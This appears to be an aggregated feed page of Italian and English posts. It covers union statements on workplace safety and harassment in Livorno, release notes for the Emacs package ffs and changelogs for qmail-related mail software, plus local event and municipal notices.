La responsabilità politica è di governi che da anni smantellano controlli, favoriscono precarietà e obbediscono agli interessi delle imprese. La responsabilità morale è di un sistema economico che pretende produttività infinita e accetta la morte come prezzo normale del profitto.
Finché il profitto verrà prima della vita, continueremo a contare i morti.
E noi continueremo a stare dalla parte dei lavoratori contro questo sistema marcio, costruito sullo sfruttamento, sulla precarietà e sul sacrificio quotidiano di chi produce ricchezza e viene ripagato con salari da fame e bare.
Non abbiamo nulla da condividere con chi si arricchisce sulla pelle degli operai.
Nessuna pace sociale con padroni e governi complici di questa strage continua.
Ogni lavoratore ucciso dal profitto pesa sulle coscienze di chi difende questo modello economico fondato sullo sfruttamento e sull’impunità.
La nostra rabbia non si spegne con le parole di circostanza.
La nostra risposta sarà organizzazione, lotta e conflitto.
Perché chi lavora ha diritto a vivere.
E chi trasforma i luoghi di lavoro in luoghi di morte deve essere chiamato con il suo nome: responsabile di un omicidio sul lavoro.


Sportello sindacale contro le molestie di genere sui luoghi di lavoro – RETE ISIDE/USB 3389336083 - sicurealavorolivorno@usb.it
Negli ultimi anni Livorno ha visto crescere il peso economico del turismo, degli eventi stagionali e dei servizi legati alla ristorazione, all’intrattenimento e all’accoglienza. Questa trasformazione ha prodotto nuove occasioni di impiego all’interno di un settore sempre più fondato su un modello di lavoro deliberatamente e strutturalmente reso povero, precario e subalterno: caratterizzato da flessibilità e stagionalità estrema, salari bassi, contratti brevi o intermittenti, part time involontari ed elevata ricattabilità economica. In molti casi si tratta di lavori svolti da giovani, studenti, lavoratrici e lavoratori migranti o persone che vivono situazioni di fragilità economica e che, proprio per questo, incontrano maggiori difficoltà nel denunciare abusi o comportamenti scorretti per paura di perdere il posto o di non essere richiamati la stagione successiva. A questo si aggiunge una diffusa area di informalità lavorativa, fatta di lavoro nero, lavoro grigio, mansioni non contrattualizzate e assenza di tutele reali, condizioni che aumentano ulteriormente l’esposizione a ricatti, abusi e molestie.
Nei contesti stagionali poi il confine tra lavoro, socialità e “intrattenimento” tende inoltre a diventare più ambiguo: bar, festival, locali, stabilimenti balneari ed eventi cittadini sono spesso spazi attraversati da consumo di alcol, rapporti informali e ritmi intensi, dove atteggiamenti molesti o discriminatori vengono troppo facilmente banalizzati come normale dinamica di settore, secondo una logica perversa di naturalizzazione degli abusi. In questo quadro, molestie, pressioni, ricatti, discriminazioni sessiste, razziste o omotransfobiche e abusi di potere rischiano di essere percepiti come inevitabili, soprattutto nei confronti di chi occupa posizioni lavorative più precarie e subalterne.
È invece opportuno riconoscere che il contrasto e la prevenzione delle molestie e degli abusi sui luoghi di lavoro contribuisce a costruire ambienti più sicuri e vivibili per tutte e tutti, rompendo il silenzio e l’isolamento che troppo spesso accompagnano queste esperienze.
In vista della stagione estiva che sta per cominciare e degli eventi che, come ogni anno, attraverseranno Livorno - a partire dai contesti ufficiali come il Festival Straborgo che si terrà in città dal 29 maggio al 1° giugno, fino ad Effetto Venezia - che comporteranno un prevedibile aumento dei flussi e dei carichi di lavoro, torna centrale il tema delle condizioni di lavoro nei settori legati al turismo, alla ristorazione, all’accoglienza e all’organizzazione. USB e la RETE ISIDE richiamano, dunque, con forza l’attenzione su un tema troppo spesso sottovalutato: la sicurezza e la tutela delle lavoratrici rispetto a molestie, comportamenti inappropriati e violenze nei luoghi di lavoro.
Le molestie NON sono “parte del lavoro”
Qualsiasi comportamento indesiderato a sfondo sessuale, verbale o fisico, che leda la dignità della lavoratrice, costituisce una violazione della normativa vigente in materia di salute e sicurezza sul lavoro (D.Lgs. 81/2008) e delle norme antidiscriminatorie. Non esiste alcuna giustificazione legata al contesto, all’afflusso di clientela o al “clima festivo”.
È responsabilità del datore di lavoro prevenire e intervenire
Ricordiamo che il datore di lavoro ha l’obbligo giuridico di garantire un ambiente di lavoro sicuro e rispettoso. Ciò significa:
• Valutare tutti i rischi, compresi quelli legati a molestie e violenze;
• Adottare misure di prevenzione e protezione adeguate;
• Intervenire tempestivamente in caso di segnalazioni.
L’inerzia o la sottovalutazione di episodi segnalati può configurare responsabilità diretta del datore di lavoro, con possibili sanzioni civili e penali.
Esiste una tutela internazionale: Convenzione ILO n. 190
L’Italia ha ratificato la Convenzione n. 190 dell’Organizzazione Internazionale del Lavoro, che riconosce il diritto di ogni persona a un mondo del lavoro libero da violenze e molestie. Questa convenzione rafforza il quadro di tutela e obbliga anche i datori di lavoro ad adottare politiche attive di prevenzione e contrasto.
Cosa possono fare le lavoratrici
RETE ISIDE e USB invitano tutte le lavoratrici a non restare sole e a tutelarsi attivamente:
• Segnalare immediatamente ogni episodio al datore di lavoro o al responsabile della sicurezza (RLS/RLST);
• Documentare quanto accade (annotazioni, messaggi, eventuali testimoni);
• Rivolgersi al sindacato per supporto e assistenza;
• In caso di mancato intervento aziendale, attivare gli organi ispettivi (Ispettorato del Lavoro, ASL);
• Nei casi più gravi rivolgersi ai Centri Anti Violenza e/o sporgere denuncia alle autorità competenti.
USB e RETE ISIDE sono al vostro fianco
Non accetteremo che, dietro la retorica dell’evento e del turismo, si nascondano condizioni di lavoro degradanti e rischiose. La sicurezza e la dignità non sono negoziabili.
Invitiamo tutte le lavoratrici della ristorazione a contattare gli Sportelli territoriali dedicati al contrasto delle molestie, delle discriminazioni e della violenza di genere nei luoghi di lavoro per segnalazioni, supporto e tutela collettiva. Solo attraverso l’organizzazione e la lotta possiamo contrastare abusi e silenzi.
Rete Iside/Unione Sindacale di Base
Sportello contro molestie, discriminazioni e violenza di genere nei luoghi di lavoro Livorno

Il 29 marzo, nel Teatro comunale di Isola del Liri (FR), si è svolto l'incontro tra due libri e due autori: Mensaleri di Wu Ming 2 e Biografia di una classe operaia. I cartai della valle del Liri. 1824 - 1954 di Alfredo Martini.
A tenere le fila del dialogo ci ha pensato Lorenzo Teodonio.



«Questa sarà una conversazione anfibia, ambigua... Dubbia... Anche mostruosa!»
Così Giada Peterle, direttrice del Museo di Geografia dell'Università di Padova, ha introdotto l'incontro su Gli uomini pesce, svoltosi proprio in quel luogo il 19 maggio 2026. Luogo che, ha aggiunto Peterle, è il«naturale approdo» del romanzo, sia perché parte di quest'ultimo è «ancorata» in quelle stanze, sia perché trattasi di un «romanzo geografico», anzi, di un romanzo che è «geografo esso stesso» e ci interroga sulla geografia come forma del pensiero.
A confrontarsi sul libro un parterre di docenti di geografia: Francesco Visentin, Andrea Pase, Luca Bonardi e Margherita Cisani. Al termine dei loro interventi, Wu Ming 1 ha raccolto gli spunti, ricostruito le tappe del suo lavoro sul romanzo e risposto alle domande del pubblico. Nel mentre, è arrivata una lettera di Antonia Nevi, di cui si è data pubblica lettura.
Mercoledì 26 maggio 2026, ore 17.00, Edificio dell’Orologio – Piazza L. Orlando, Livorno
Presentazione del volume Storia della Repubblica. L’Italia dalla Liberazione ad oggi (1945–2026) di Guido Crainz (Donzelli, 2026).
Ottant’anni di storia repubblicana sono il risultato di un percorso intenso, intriso di speranze e delusioni, di traumi e mutamenti inavvertiti. Quanto siamo cambiati? E quanta parte di questa storia è ancora viva nella nostra memoria collettiva? Con questo volume Crainz ripercorre l’Italia dalla Ricostruzione fino ai giorni nostri, con uno sguardo capace di intrecciare politica, società e cultura di massa, e con un capitolo finale dedicato agli ultimi dieci anni e alle trasformazioni in corso nella fisionomia culturale e istituzionale del paese.
Con l’autore dialogheranno Rocco Garufo (Assessore del Comune di Livorno) e Catia Sonetti (Direttrice ISTORECO Livorno). Introduce e coordina Claudia Pavoletti, giurista e operatrice culturale.
L’ingresso è libero e gratuito.
In the recent weeks I've been engaging Prot as a coach to help review
my new ffs package for GNU Emacs as I worked on preparing it for
inclusion in GNU ELPA, as well as discussing other Emacs- and
life-related topics.
UPDATE 2026-05-23 22:39:15 -0400: Prot also published an article about our session on his website: https://protesilaos.com/commentary/2026-05-23-life-issues-and-philosophy-amin-bandali/
In our nearly 2-hour conversation, we discussed at length and in depth various aspects of life in the current times. For instance, feeling overwhelmed in the face of innumerable things happening at once, with technology changing our perception and making events feel proximate and imminent.
We talked about seasonality and rhythms in life, including in relation to burnout and knowing our own limitations, and descriptive vs prescriptive thinking when reflecting on the expectations we may place on our self when comparing our self to others through the lens of our necessarily-incomplete impressions and glimpses of their lives. We discussed absence or loss as a dual to presence or persistence in the process of life. How with our memories and through embodying the philosophy and teachings of departed loved ones their essence and legacy continues to live on within us. But also loss in the sense of us losing parts of our self in life-defining moments while preserving other parts and gaining new ones, being liberated of some of the burdens of our past self and in effect becoming someone else in the process.
In being true to our self, we talked about humans as multi-faceted beings and the importance of expressing and giving a voice to these different aspects of our self, and keeping alive that child-like sense of awe and wonder. To live a life where the pace and rhythms of our environment are in sync with our internal rhythms, and to not give others undue power over us or our happiness through trying to live according to their prescribed standards or expectations.
I also learned more about Prot's practical philosophy of situational awareness in life, not merely as a means for survival, but also as a way of appreciating all of the beauty that surrounds us, and a method for gaining the knowledge and skills to apply what we learn from patterns in one area of life to other areas.
We concluded our session with a mention to the concept of sanctity, to set aside a sacred time or place for our self wherein no distractions are allowed, where we can unwind, rest, and recharge for whatever comes next.
Here is the video recording of our session, which I share with Prot's permission:
You can view or download the full-resolution video from the Internet Archive.
Like Prot, I am invigorated and inspired to live a full, honest life. To do my best, do what I do in earnest, and make the best of what I have.
Take care, and so long for now.



Conclusa la conferenza annuale sui temi dell’etica digitale, dell’autonomia tecnologica e del futuro condiviso della ricerca a Pisa dal 19 al 21 maggio 2026.

Italian Linux Society ha attivato il nuovo conto in Banca Etica e iniziamo l'abbandono di Unicredit. I motivi.
Continua la lettura… (ulteriori 7 minuti di lettura)
ffs provides a minor mode for simple plain text presentations in
Emacs, where the slides are separated using the page-delimiter, by
default the form feed character (^L).
I wrote ffs in early 2022 for my LibrePlanet 2022 presentation the
Net beyond the Web, and earlier this year decided to polish it towards
being a proper package and submit it to GNU ELPA. The manual still
needs some more work, but the overall package is in pretty good shape
so I submitted for inclusion in GNU ELPA.
ffs
ffs and I owe a debt of gratitude to Protesilaos for rounds of
code review and feedback for improving and polishing the package in
preparation for submission to GNU ELPA. You can watch videos of these
sessions posted earlier on my website:
Further, inspiration for parts of ffs's implementation was
gratefully drawn from Protesilaos's Logos package for Emacs.
Dedicated to the loving memory of Farangis Yousefinia.
Below are the release notes.
First release of ffs on GNU ELPA.
The attempted build of ffs 0.2.1 within GNU ELPA build sandbox failed
with an Error: void-function (org-texinfo-kbd-macro) due to use of
#+macro: kbd (eval (org-texinfo-kbd-macro $1)) in ffs.org for better
formatting of key sequences in the exported Texinfo copy. This seems
to have happened for the specific case of generating a plain text
README using ox-ascii where ELPA didn't load ox-texinfo. To try
and mitigate this, a README.md has been added for use as the package
README instead of ffs.org. If not sufficient, a Texinfo copy of the
ffs manual will be shipped instead of the Org one in the next release.
ffs 0.2.2 also includes small fixes and improvements throughout
ffs.el from Stefan Monnier, and additional feedback to be addressed
in future releases.
The attempted build of ffs 0.2.0 within GNU ELPA build sandbox failed with a "Cannot include file" error on the "#+include: fdl.org" in the manual. So, as a workaround, we switch to using the official Texinfo copy of the GNU FDL license rather than an Org copy.
First release of ffs intended for GNU ELPA.
After a few years of inactivity, in early 2026 I decided to dust off
ffs.el, polish and document it, and offer for inclusion in GNU ELPA
as a proper package.
ffs-default-face-height changed to nil
To minimize unexpected and/or unnecessary changes out-of-the-box, the
default value of ffs-default-face-height has been changed to nil.
ffs-edit-buffer-name demoted from user option to variableThis is not an important user-facing setting, so to help avoid overwhelming users with many options, this has been demoted from a user option to a variable.
ffs's behaviour
As part of the effort to bring ffs more in line with the conventions
of other existing Emacs packages, the mechanisms for toggling various
parts of Emacs's interface to minimize visual clutter were changed
from being minor modes to being customizable user options. These are
the replacement new user options, with a default value of nil:
ffs-hide-cursorffs-hide-mode-lineffs-hide-header-line
Their value is buffer-local, and may be set globally using
setq-default. See the sample configuration in the manual for an
example of how to customize them.
The new ffs-page-delimiter user option defines the page delimiter
inserted by ffs-edit-done when inserting a new slide. Emacs's
page-delimiter regexp should be able to match ffs-page-delimiter's
value, so if you use a custom page-delimiter be sure to customize
ffs-page-delimiter accordingly.
The new ffs-echo-progress user option controls whether to display in
echo area the progress through the slides. When non-nil, changing
slides will also display the progress through the slides in the echo
area. The format of the displayed progress can be customized using
the new ffs-echo-progress-format user option.
The new ffs-edit-display-buffer-alist user option may be used to
control the Window configuration for the ffs-edit buffer. By
default, it will display the ffs-edit buffer in the same window.
The new ffs-edit-done-hook user option may be used to define hooks
to be run at the end of ffs-edit-done after returning to the main
ffs presentation buffer.
Lastly, a new ffs-find-speaker-notes-function variable was added to
allow customizing the find function used for opening the speaker's
notes file, defaulting to find-file-other-frame.
Initial publication of ffs.el as part of my personal configurations
for GNU Emacs.
My first attempt at this concept was a now-archived ffsanim.el,
a major mode implementation that used Emacs's animate library to
animate slide texts onto the screen. Shortly after realizing the
shortcomings of that approach, I abandoned it in favour a minor mode
implementation and published version 0.1.0 of what is now ffs in
my personal configs repository.
I used this implementation for presenting my LibrePlanet 2022 talk, The Net beyond the Web.
I picked "ffs" as the package name, the acronym for form feed slides.


dovecot_config_version and dovecot_storage_version in dovecot.conflua as a dependency. Added --without-lua at configure commanduserdb iterate query nor orders by domain and username commitfts_autoindex = no added to Trash and Junk folders commit+ character added to auth_username_chars commitvpopmail configured with --disable-many-domainsRoundcube è una webmail avanzata con una bella interfaccia grafica.

$config['quota_zero_as_unlimited'] = true; to show quota unlimited instead of unknown for accounts with unlimited quotaHo appena tirato su una modifica a tutto il codice di base, mirata a rendere il codice di qmail compatibile con le specifiche C23 e i gli ultimi compilatori GCC e Clang. Sul mio server di produzione funziona senza alcun problema da alcune settimane. La compilazione è stata testatta su linux, freebsd, openbsd, netbsd e con i compilatori GCC fino alla versione 15.2 e Clang fino alla versione 19.1.7. Trattandosi di una modifica importante, prima del rilascio definitivo, chiederei a chi ne avesse la possibilità di collaborare al testing scaicando l'ultima versione come segue
git clone https://github.com/sagredo-dev/qmail.git
qmailctl, qmHandle, queue_repair and all scripts installed in QMAIL/bin and not in /usr/local/bin by config-all.shqmailctl script, DKIM control/filterargs and control/domainkeys dir, SURBL, smtpplugins, helodnscheck spp plugin, svtools, qmHandle, queue-repair, SSL key file (optional). Server Name Indication (SNI) è una estensione del protocollo TLS che consente a un server di presentare differenti certificati a seconda dell'hostname richiesto dal client durante il saluto TLS.
In un ambiente email moderno, molti domini condividono uno stesso indirizzo IP per i servizi SMTP, IMAP, POP3 e submission. Senza SNI, un amministratore di un server email può presentare un solo certificato per ogni socket disponibile, cosa che obbliga l'aministratore ad affidarsi a certificati multi-dominio (SAN) o a certificati con wildcard. Questo approccio aumenta i problemi operativi tra gli utenti finali novelli, che spesso non sono in grado di usare la configurazione automatica del client per configurare correttamente le loro mailbox.
L'abilitazione di SNI nei serivizi mail consente al server di presentare il certificato appropriato basato sull'hostname richiesto dal client, contenuto nel suo indirizzo email.
La funzionalità SNI per la mia distribuzione qmail è stata aggiunta da Andreas Gerstlauer (commit qui e qui), che vorrei ringraziare.
Clam AntiVirus is an open source (GPL) anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways.
vpopmail: 5.6.13Vpopmail fornisce un modo semplice di gestire indirizzi di posta su domini virtuali e account email diversi da quelli su /etc/passwd.
- migliorata la sezione "upgrade"vmysql.c changes (#10)
valias_create_table now check if table is already created in order to avoid warnings in dotqmail2valiasvalias_insert functionqmailadmin calls in #9s/qmail users (look here)--enable-defaultdelivery) changes (more info here, commit):
vdelivermail is installed by default in .qmail-default of newly created domains with option 'delete' as in the previous version.vdelivermail, to avoid loops.VqAdmin è un pannello di controllo su interfaccia web che consente di eseguire azioni che richiedono l'accesso a root — per esempio, aggiungere e cancellare domini.
Come si può vedere, VqAdmin ha una nuova versione con un nuovo aspetto mobile responsive, con tutte le mie vecchie patch incluse (compresa quella di ALI) e diverse correzioni e ripuliture del codice sorgente. Ho risolto tutti i warnings sia di autotools che di gcc e cambiato un paio di cose per poter rifare il tema html (guardare il changelog per maggiori dettagli). Come sempre i contributi nei commenti sono graditi.
PS: anche la parte apache è stata modificata e prima di fare l'aggiornamento è necessario guardare quali modifiche sono necessarie.
Have fun!
Questa pagina riguarda la patch DKIM inclusa nella mia patch combinata (maggiori informazioni qui). Questo argomento è avanzato ed è consigliabile tornare qui alla fine del tutto.
DKIM fornisce un metodo per validare l'identità di un nome a dominio associato a un messaggio con una autenticazione crittografata. La tecnica di validazione è basata sulla crittografia di una chiave pubblica: Il server che invia l'email aggiunge il nome a dominio al messaggio e vi affigge una firma digitale. Questa chiave è posta nell'intestazione DKIM-Signature: del messaggio. Colui che riceve il messaggio può controllare la validità della chiave pubblica leggendo un record TXT del DNS del dominio associato al messaggio.
Sei invitato a dare un'occhiata alle pagine man a partire da qmail-dkim(8) e spawn-filter(8).
ERROR_FD=2 in control/filterargs to send error output of qmail-dkim in stderr when acting as a qmail-remote filter (Andreas Gerstlauer)ed25519 support (RFC 8463)DKIMSIGN / DKIMSIGNEXTRA / DKIMSIGNOPTIONS DKIMSIGNOPTIONSEXTRA variablesdomainkey script replaced by dknewkey in order to create ed25519 keys and rsa keys with 1024/2048/4096 bitlibdomainkeys.a library)rsa key together with the ed25519 key below.
qmail-sppprovides plug-in support for qmail-smtpd. It allows you to write external programs and use them to checkSMTPcommand argument validity. The plug-in can trigger several actions, like denying a command with an error message, logging data, adding a header and much more.
Today I played for the first time with an ancient patch for qmail: qmail-spp. I was really impressed for the ease of use and the elegance of its code, which is inserted inside qmail-smtpd.c with a few touches, despite of the many things that it can do when installed and enabled.
It can run a custom plugin in any language and at any level of the smtp session, grabbing the environment variables, writing into stderr or blocking the smtp session with a return error for the sender.
In no time at all I managed to understand its logic and write a small plugin by adapting a c program I wrote for s/qmail a few months ago to check the validity of the recipient.
Of course I decided to add this patch to my combo. I've just modified the way it has to be enabled, just not to bother those who don't want to touch their run scripts. So, while the original patch is enabled by default, I modified things a little bit so that you have to manually enable it by exporting the variable ENABLE_SPP in your run scripts. Therefore the original NOSPP variable is useless.
Have fun!
Ora che abbiamo preparato i filtri antispam dobbiamo addestrare il nostro sistema bayesiano e inviare i report a Razor, Pyzor e Spamcop.
La cosa più ovvia che può venirci in mente di fare a questo punto è forse quella di lanciare sa_learn e spamassassin --report uno dopo l'altro al click sul bottone "Marca come Spam" della webmail Roundcube (vedere i driver cmd_learn e multi_driver del plugin markasjunk), ma questa scelta ha alcuni svantaggi importanti:
E' qundi più corretto eseguire questi due compiti durante la notte per mezzo di un cronjob (primo problema risolto), processando i soli messaggi di vero spam/ham che l'utente ha consapevolmente copiato in una cartella apposita (secondo problema).
Tired of the nightmares of remotely compiling the kernel with Linux-VServer, a software that I'm pleased with despite of some lack of documentation, these days I was playing with LXC, which is included and supported by Slackware and for which the Linux kernel doesn't need any patching because it already embeds the hacks for LXC containers.
To convert an existing Linux-VServer container in a (eventually unprivileged) LXC container you can follow these steps. I assume that you already know how to create an LXC container; in case you are interested in unprivileged containers take a look to the excellent Chris Willing's guide (a big thanks to him) linked below.
More info:
Era ora che riuscissi a liberarmi della vecchia piattaforma Drupal come strumento per questo blog, ma finalmente ho trovato il tempo per migrare il database di Drupal e per riprendere qui la vecchia grafica (solo lo stile, il codice html è mio).
D'altronde, da almeno 15 anni porto avanti lo sviluppo di un mio CMS (basato su php/mariadb), che però originariamente non avevo usato per la mancanza del tempo necessario a costruirmi un tema html.
Ora il sito vive in ambiente Mobile Responsive e soprattutto mi consente di svincolarmi dagli incubi degli aggiormanti di Drupal e dei suoi pacchetti.
La parte sui commenti del presente CMS non è perfettamente collaudata e mi farebbe piacere avere eventualmente dei feedback su ogni problematica, quindi non esitate a scrivermi al riguardo.
Buon divertimento!


Massive Christmas present by my italian friend Luca Franceschini of digitalmind. He merged his combo with my combined patch (2016.12.02 version) adding several (heavily customized) patches and functionalities. Luca is a C programmer and an expert system administrator who manages big servers.
This is bug-fix release for 1.29.0.
Feature highlights✨:
.txt import of feed URLs in additional to e.g. OPMLBug fixes highlights 🐛:
UI highlights 🖼:
This release has been made by @Alkarex, @Frenzie, @IEEE-754, @Inverle, @McFev, @ciro-mota, @cweiske, @polybjorn and newcomer @mzl2233
Full changelog:
lib_opml library #8652, #8853,
Files by age, newest first:
ls -lt
Docker images by age, newest first:
docker images --format "{{.CreatedAt}}\t{{.Repository}}:{{.Tag}}" | sort -r
Files by size, largest first:
ls -lS
Docker images by size, largest first:
docker images --format "{{.Size}}\t{{.Repository}}:{{.Tag}}" | sort -rh
Why why why??!
Alcune storie possono essere raccontate, più o meno fedelmente, ma la memoria può giocare brutti scherzi. Nel caso di Indymedia Italia, https://italy.indymedia.org, è invece possibile, se pure con alcuni limiti, verificare direttamente – anche a distanza di 20 e più anni – i contenuti di un sito attivo dal 2001 al 2006, quando sospese la sua attività a favore di altri siti, locali e regionali, fino alla progressiva chiusura.
Quella che trovate qui è una copia di archivio realizzata da noi nel 2021 in occasione del ventennale di Genova G8, quando fu allestita una installazione temporanea del sito.
La piattaforma ha utilizzato due diversi software: Catalyst CMS dal 2001 al 2003, e SF-Active dal 2003 al 2006. La versione conservata qui è la seconda, quella basata su SF-Active e quindi l’aspetto grafico delle pagine è diverso da quello visibile durante le giornate del luglio 2001. L’archivio è navigabile ma statico: fotografa lo stato del sito nel 2006 e ovviamente non consente modifiche o pubblicazione di nuovi contenuti.
Per la natura tecnologica di questo tipo di archivi questa è una copia incompleta, non sono archiviati e visitabili tutti i link verso risorse esterne e molte pagine o contenuti di esse potrebbero non essere visibili.
È disponibile un motore di ricerca, che permette di ricercare i testi delle pagine, e filtrare per data.
Ulteriormente stiamo curando una raccolta di pubblicazioni (libri, articoli di riviste, tesi, siti) che hanno indagato la storia, le pratiche e l’eredità politica di Indymedia.
Il nostro collettivo aveva partecipato attivamente al progetto Indymedia, contribuendo alla sua crescita. La nostra attitudine — mutuata dalle sottoculture hacker e fondata sui principi di condivisione, apertura, valorizzazione delle differenze e desiderio di sperimentare tecniche e linguaggi — aveva reso possibile un radicale esperimento collettivo di autogestione.
AAMPS conferma che in occasione della festività di venerdì 22 maggio prossimo il servizio di raccolta dei rifiuti si svolgerà regolarmente. È previsto solo un cambiamento negli itinerari di interesse per gli abitanti dell’area Livorno Est.
Ecco il dettaglio suddiviso per Aree valido per la raccolta nel giorno di Santa Giulia:
Area Livorno Nord
Il calendario ordinario non prevede il servizio di raccolta il venerdì.
Area Sant’Jacopo Marradi
Carta-cartone: servizio attivo la mattina (esposizione del materiale dalle ore 21.00 di giovedì alle 5.00 del giorno di raccolta).
Area Vittoria Stazione Zola
Indifferenziato: servizio attivo la mattina (esposizione del materiale dalle ore 21.00 di giovedì alle 5.00 del giorno di raccolta).
Area Livorno est
Organico: servizio anticipato alla mattina (valido solo per le utenze che espongono il materiale con il mastello dalle ore 21.00 di giovedì alle 5.00 del giorno di raccolta).
Area Picchianti – Porta a Terra
Il calendario ordinario non prevede il servizio di raccolta il venerdì.
Area Ardenza – La Rosa
Organico: servizio attivo la mattina (valido solo per le utenze che espongono il materiale con il mastello dalle ore 21.00 di giovedì alle 5.00 del giorno di raccolta).
Livorno Sud
Multimateriale: servizio attivo la mattina (esposizione del materiale dalle ore 21.00 di giovedì alle 5.00 del giorno di raccolta).
Area Pentagono
Carta-cartone: servizio attivo la sera (esposizione del materiale dalle ore 19.30 alle 20.00).
Tutti i contenitori stradali presenti nelle aree “Pentagono” e “Centro Allargato” saranno regolarmente vuotati.
Il Centro di raccolta “Livorno Sud” e il “Centro del riuso creativo” saranno chiusi venerdì e riapriranno il giorno seguente.
L'articolo Raccolta rifiuti: servizi attivi nella festività del 22 maggio proviene da Aamps Livorno.
Lunedì 18 lo sciopero delle lavoratrici e dei lavoratori degli asili nido ha registrato un’adesione altissima, portando alla chiusura di numerosi nidi e dimostrando con forza quanto fossero reali le criticità denunciate sul nuovo bando.
La mobilitazione e la pressione esercitata in questi giorni hanno prodotto oggi, nell’incontro in Comune a Pisa, un primo risultato concreto: è stata formalizzata un’integrazione al bando che chiarisce finalmente il monte ore del servizio. Si passa ufficialmente da 241 ore + 8% a 260 ore + 8% di lavoro non frontale, riconoscendo una parte essenziale del lavoro educativo troppo spesso invisibilizzata e lasciata nell’incertezza.
Un primo risultato importante, conquistato grazie alla lotta collettiva di lavoratrici e lavoratori. Ma la mobilitazione non finisce qui: continueremo a lottare per risolvere le criticità ancora presenti nel lavoro pubblico esternalizzato e per garantire diritti, dignità del lavoro e qualità dei servizi pubblici.
Unione Sindacale di Base Federazione di Pisa


Comunicato a cura dell’uff. Stampa del Comune di Livorno.
Livorno, 19 maggio 2026 – Da domani, mercoledì 20 maggio, sarà in vigore a Livorno l’ordinanza che obbliga i proprietari e i detentori di cani a rimuovere con acqua le deiezioni liquide degli animali nelle aree pubbliche e di uso pubblico.
L’ordinanza, della quale ha parlato la stampa italiana e straniera, avrà una durata di cinque mesi e terminerà il 31 ottobre in vista poi di introdurre questo provvedimento all’interno di regolamento comunale che estenderà l’obbligo a tutto l’anno.
In pratica sarà obbligo munirsi di appositi contenitori d’acqua da utilizzare per l’immediata rimozione delle deiezioni liquide depositate su superfici pavimentate e su altri spazi di arredo urbano, e sui mezzi di locomozione (ad esempio ruote di macchine o di scooter) parcheggiati sulla pubblica via.
È inoltre fatto assoluto divieto di consentire ai cani di urinare a ridosso di portoni e vetrine ed accessi ad abitazioni, uffici e negozi.
Lo ha stabilito appunto l’Amministrazione comunale con l’ordinanza sindacale n. 135 del 28 aprile 2026, emanata a seguito delle numerose segnalazioni pervenute da parte di cittadini che evidenziano il disagio determinato dalle maleodoranze e gli inconvenienti igienico-sanitari derivanti dalla presenza di deiezioni liquide animali sugli spazi destinati alla socializzazione di adulti e bambini, visto anche il notevole e crescente numero di animali d’affezione, in particolare cani, presenti sul territorio comunale.
Il provvedimento è stato al centro di una conferenza stampa alla quale hanno partecipato: la vicesindaca con delega alla Tutela Animali Libera Camici, l’assessora con Delega al Decoro Urbano Giovanna Cepparello, la garante degli animali Elisa Amato, la dirigente del Settore Manutenzioni e Cura della Città Silvia Borgo, la dirigente settore Istruzione, Giovani, Partecipazione e Tutela Animale Michela Casarosa, la responsabile dei Servizi Territoriali della Polizia Municipale Michela Pedini, la funzionaria Barbara Saliva, il responsabile del Decoro Urbano di Aamps/Retiambiente Andrea Valenti, la guardia zoofila dell’Oipa Giuliano Morelli.
Per quanto riguarda le deiezioni solide, gli articoli 31 e 32 del vigente Regolamento Comunale sulla Tutela degli Animali (la cui ultima modifica risale al 2018) prescrivono l’obbligo di rimuoverle immediatamente a chi accompagna i cani nelle zone pedonali e nelle aree verdi, comprese quelle di libera circolazione dei cani, nei giardini e nei parchi, negli esercizi pubblici, commerciali e nei locali ed uffici aperti al pubblico, utilizzando mezzi idonei alla rimozione, da mostrare su richiesta del Pubblico Ufficiale, a pena di sanzione secondo quanto previsto dall’art. 42 dello stesso Regolamento.
Il Regolamento attuale non prevede però analoga norma per quanto attiene alle deiezioni liquide.
Nelle more di una modifica alla regolamentazione comunale vigente, l’ordinanza 135/2026 adotta misure atte a prevenire e contenere tali fenomeni, per tutto il periodo più critico dal punto di vista climatico. Il significativo aumento delle temperature che si verifica in primavera-estate, associato a una diminuzione delle precipitazioni, incide infatti anche sulla salubrità e sul decoro degli spazi urbani, anche in conseguenza della maggiore evaporazione di liquidi organici dalle superfici pavimentate.
Nello specifico, il testo integrale dell’ordinanza n. 135 impone, dal 20 maggio al 31 ottobre, a tutti i possessori o detentori a qualsiasi titolo di cani, anche se incaricati temporaneamente della loro custodia o conduzione:
• di munirsi, durante l’accompagnamento dei cani, di apposite bottigliette, spruzzatori o altri contenitori d’acqua, senza aggiunta di sostanze chimiche o detergenti, da versare all’occorrenza;
• di riversare una congrua quantità di acqua in corrispondenza del punto interessato dalle deiezioni liquide dei cani ai fini della loro diluizione e della ripulitura delle superfici interessate, su tutte le aree urbane pubbliche o ad uso pubblico e relativi manufatti e sulle aree private che si affacciano su aree pubbliche o ad uso pubblico, nonché sui mezzi di locomozione parcheggiati sulla pubblica via;
• è fatto divieto assoluto di consentire ai cani di urinare a ridosso dei portoni di ingresso e degli accessi ad abitazioni, uffici e negozi e vetrine.
L’inosservanza di queste disposizioni comporta l’applicazione di una sanzione amministrativa pecuniaria da 25 a 500 euro, ai sensi dell’art. 7-bis del D. Lgs. 267/2000.
Rimane comunque a carico del trasgressore il ripristino dei luoghi.
Gli interventi
La Vicesindaca ha introdotto l’ordinanza sottolineando la sua grande risonanza mediatica, anche a livello internazionale.
“Lo scopo principale non è punitivo, ma mira a elevare lo standard di igiene e decoro delle strade, dei marciapiedi e degli arredi urbani. Livorno conta circa 20.000 cani, un numero consistente che richiede responsabilità da parte dei proprietari per garantire una convivenza civile. La mancanza di rispetto delle regole da parte di una minoranza danneggia il lavoro degli operatori, dei proprietari responsabili e limita la fruibilità degli spazi pubblici, come i parchi, specialmente per i bambini”.
La Vicesindaca ha inoltre ricordato che l’Amministrazione ha rimosso i divieti di accesso ai cani in molti parchi per favorire le famiglie, ma avverte che, “se le segnalazioni di sporcizia e cani senza guinzaglio continueranno, potrebbero essere reintrodotte limitazioni”.
Ha inoltre ricordato il protocollo d’intesa con le guardie zoofile dell’OIPA, che hanno il potere di elevare sanzioni insieme alla Polizia Locale.
